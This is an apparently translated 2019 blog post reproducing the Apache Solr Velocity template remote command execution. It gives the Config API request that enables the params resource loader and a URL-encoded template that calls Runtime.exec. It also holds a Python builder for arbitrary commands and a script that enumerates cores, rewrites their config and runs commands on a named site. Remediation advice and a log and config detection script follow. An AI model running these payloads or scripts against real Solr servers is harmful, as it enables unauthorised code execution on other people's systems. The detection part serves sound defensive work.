Apache Solr remote command execution vulnerability reproduction

0x00 Introduction

Apache Solr is an open-source search server. Security researcher s00py recently published a 0-day remote command execution vulnerability in Solr's Velocity response writer: the unauthenticated Config API can be used to enable the VelocityResponseWriter with its params resource loader switched on, after which a Velocity template supplied in the request's query string is rendered on the server with full access to Java reflection. At the time of writing (31 October 2019) no official patch has been released.

0x01 Reproduction

The PoC was published by s00py; see https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

First, look up the core name in Core Admin (or via /solr/admin/cores); in this environment it is logadmin. The PoC requests below use a core named test, so substitute your own core name.

Next, check whether the core's config endpoint (/solr/<core>/config) can be reached without authentication.

Then, following s00py's PoC, POST the JSON below to the Config API. It registers (or redefines) the velocity response writer with params.resource.loader.enabled set to true, which is what later allows the template to be taken from request parameters:

POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}

Once the config update succeeds, the PoC can execute arbitrary commands. wt=velocity selects the writer, v.template=custom names the template, and v.template.custom carries the template body itself; the following request runs id:

GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
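The PoC only ever shows the template URL-encoded. The block below, added here and not part of s00py's gist or the original post, reconstructs the decoded Velocity template for an arbitrary command and re-encodes it exactly the way the PoC does, so the request above can be rebuilt for any core and command. The function names (velocity_template, select_path) are this example's own; the template text is the PoC's.

```python
from urllib.parse import quote_plus

# Readable form of the template that the PoC sends URL-encoded in v.template.custom.
# Velocity exposes Java objects to the template: $x is an empty String, $x.class is
# its java.lang.Class, and Class.forName() from there loads any class. The template
# uses that to reach java.lang.Runtime, runs the command, and copies the process's
# stdout into the response one byte at a time (Character.toChars + String.valueOf
# turn each byte back into text). {cmd} is the only placeholder in the PoC's text.
TEMPLATE = (
    "#set($x='') "
    "#set($rt=$x.class.forName('java.lang.Runtime')) "
    "#set($chr=$x.class.forName('java.lang.Character')) "
    "#set($str=$x.class.forName('java.lang.String')) "
    "#set($ex=$rt.getRuntime().exec('{cmd}')) "
    "$ex.waitFor() "
    "#set($out=$ex.getInputStream()) "
    "#foreach($i in [1..$out.available()])"
    "$str.valueOf($chr.toChars($out.read()))"
    "#end"
)


def velocity_template(cmd):
    """Return the decoded Velocity template that runs `cmd`.

    The command sits inside a Velocity single-quoted string literal, so a quote in
    it would break the template. Runtime.exec(String) also only splits on
    whitespace: pipes, redirects and other shell syntax are not interpreted.
    """
    if "'" in cmd:
        raise ValueError("command must not contain a single quote")
    return TEMPLATE.format(cmd=cmd)


def select_path(core, cmd):
    """Build the /select request path with the PoC's own encoding.

    The PoC leaves ( ) $ = [ ] . unescaped and encodes only '#', the quotes and
    spaces (spaces as '+'). Solr decodes the parameter before Velocity sees it,
    so any standard URL encoding of the same template works equally well.
    """
    encoded = quote_plus(velocity_template(cmd), safe="()$=[].")
    return ("/solr/" + core + "/select?q=1&&wt=velocity&v.template=custom"
            "&v.template.custom=" + encoded)


if __name__ == "__main__":
    print(velocity_template("id"))
    print(select_path("test", "id"))
```

One caveat the decoded form makes visible: the loop reads only the number of bytes that $out.available() reports right after the process exits, so output is returned as a single string with no newline handling, and very large outputs may come back truncated.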

0x03 Verification script

import json
import requests

# The default command echoes this marker; finding it in the response proves that the
# inline template was rendered and the command actually ran.
MARKER = "boo"

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36",
    "Connection": "close",
}


def get_collection(url):
    """Enumerate cores through the Core Admin API; returns [] when nothing is found or on error."""
    try:
        admin_solr = url + '/solr/admin/cores'
        # wt=json so that older Solr versions (which default to XML) also answer in JSON
        res = requests.get(admin_solr, params={"wt": "json"}, headers=HEADERS, timeout=10)
        colls = list(json.loads(res.text)["status"].keys())
        if colls:
            print("[+] Get Collection Success For : " + url)
        return colls
    except Exception:
        print("[-] Get Collection Error For : " + url)
        return []


def set_config(url, coll):
    """Register the Velocity writer with the params resource loader enabled via the Config API."""
    try:
        config_url = url + "/solr/" + coll + "/config"
        # named payload rather than json so the json module is not shadowed
        payload = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity", "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}}
        res = requests.post(config_url, headers=HEADERS, json=payload, timeout=10)
        if res.status_code == 200:
            print("[+] Set Config Success For : " + url + "|" + coll)
            return True
        print("[-] Set Config Failed For : " + url + "|" + coll)
        return False
    except Exception:
        print("[-] Set Config Error For : " + url + "|" + coll)
        return False


def run_cmd(url, coll, cmd="echo " + MARKER):
    """Render a Velocity template taken from the request that runs cmd and returns its stdout."""
    try:
        poc = ("/solr/" + coll + "/select?q=1&&wt=velocity&v.template=custom&v.template.custom="
               "%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))"
               "+%23set($chr=$x.class.forName(%27java.lang.Character%27))"
               "+%23set($str=$x.class.forName(%27java.lang.String%27))"
               "+%23set($ex=$rt.getRuntime().exec(%27" + cmd + "%27))+$ex.waitFor()"
               "+%23set($out=$ex.getInputStream())"
               "+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end")
        res = requests.get(url + poc, headers=HEADERS, timeout=10)
        if MARKER in res.text:
            print("[+] Vulnerable : " + url + "|" + coll)
            print(res.text.strip())
            return True
        print("[-] Not Vulnerable : " + url + "|" + coll)
        return False
    except Exception:
        print("[-] Run Cmd Error : " + url + "|" + coll)
        return False


if __name__ == '__main__':
    url = 'http://zhengbao.wang'  # target base URL; the original points at the author's own site
    for coll in get_collection(url):
        if set_config(url, coll):
            run_cmd(url, coll)

0x04 Remediation

  • Put Solr behind access control: do not expose port 8983 to untrusted networks, enable authentication (for example Solr's BasicAuthPlugin with blockUnknown enabled), and restrict the Config API (/solr/<core>/config) and the Core Admin API to administrators, since the attack starts with an unauthenticated config write.
  • Watch for and apply the official patch. Until then, do not enable the VelocityResponseWriter, and audit existing core configs for a velocity writer with params.resource.loader.enabled set to true, which is the setting that lets a request supply its own template.
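Two checks that follow from the attack chain above, added here as an example and not part of the original post: a scan of Jetty-style request log lines for the config write followed by a velocity request carrying a reflective template from the same source (Solr does not log POST bodies, so the config write is detected by path and method only, while the template travels in the query string and is fully visible), and an audit of a core's Config API answer for the risky writer setting. The log lines and the config document are constructed for this example; the Config API response shape ({"config": {"queryResponseWriter": {...}}}) is an assumption to verify against your own Solr version.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Jetty-style request log lines (hosts and timestamps are made up); the
# third line carries the start of the PoC's Velocity template.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Oct/2019:15:05:01 +0800] "GET /solr/admin/cores HTTP/1.1" 200 512
10.0.0.5 - - [31/Oct/2019:15:05:02 +0800] "POST /solr/test/config HTTP/1.1" 200 40
10.0.0.5 - - [31/Oct/2019:15:05:03 +0800] "GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($ex=$rt.getRuntime().exec(%27id%27)) HTTP/1.1" 200 128
10.0.0.7 - - [31/Oct/2019:15:06:00 +0800] "GET /solr/test/select?q=solr&wt=json HTTP/1.1" 200 2048
"""

# Constructed Config API answer in the shape assumed for GET /solr/<core>/config.
SAMPLE_CONFIG = {
    "config": {
        "queryResponseWriter": {
            "json": {"name": "json", "class": "solr.JSONResponseWriter"},
            "velocity": {
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "startup": "lazy",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true",
            },
        }
    }
}

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
CONFIG_PATH_RE = re.compile(r"/solr/[^/]+/config/?")
# Reflection and process-spawning calls that have no place in a search template.
RCE_PATTERN = re.compile(r"class\.forName|getRuntime\(\)|\.exec\(")


def classify_request(line):
    """Return the findings for one access-log line (empty list when nothing stands out)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    parts = urlsplit(m.group("target"))
    # Step 2 of the attack: a write to the Config API. The body is not logged, so any
    # POST to /solr/<core>/config from a non-admin source deserves a look.
    if m.group("method") == "POST" and CONFIG_PATH_RE.fullmatch(parts.path):
        findings.append("config-api-write")
    # Step 3: the template is delivered in the query string, so it is in the log.
    # parse_qs already undoes the %xx and '+' encoding of the parameter values.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("wt", [""])[0].lower() == "velocity":
        findings.append("velocity-writer")
        if "v.template.custom" in qs:
            findings.append("inline-template")
            if RCE_PATTERN.search(qs["v.template.custom"][0]):
                findings.append("template-rce-pattern")
    return findings


def suspicious_sources(log_text):
    """Sources that both wrote the Config API and sent a reflective Velocity template."""
    per_src = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            per_src.setdefault(m.group("src"), set()).update(classify_request(line))
    needed = {"config-api-write", "template-rce-pattern"}
    return {src for src, found in per_src.items() if needed <= found}


def audit_config(config_json):
    """Names of response writers that let request parameters define the template."""
    writers = config_json.get("config", {}).get("queryResponseWriter", {})
    return [
        name for name, w in writers.items()
        if "VelocityResponseWriter" in str(w.get("class", ""))
        and str(w.get("params.resource.loader.enabled", "false")).lower() == "true"
    ]


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        print(classify_request(line), line[:60])
    print("suspicious sources:", suspicious_sources(SAMPLE_LOG))
    print("risky writers:", audit_config(SAMPLE_CONFIG))
```

A velocity request on its own is not proof of attack (a legitimately configured writer may be in use), which is why suspicious_sources requires both the config write and the reflective template from the same source; the audit_config result is what to act on regardless of whether any attack has been seen.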

0x05 References

https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt


Author: boogle

Published: 2019-10-31 15:05

Last updated: 2019-10-31 15:52

Original link: https://zhengbao.wang/apache-solr远程命令执行漏洞复现/

License: CC BY-NC-ND 4.0 International. Please keep the original link and author when reposting.
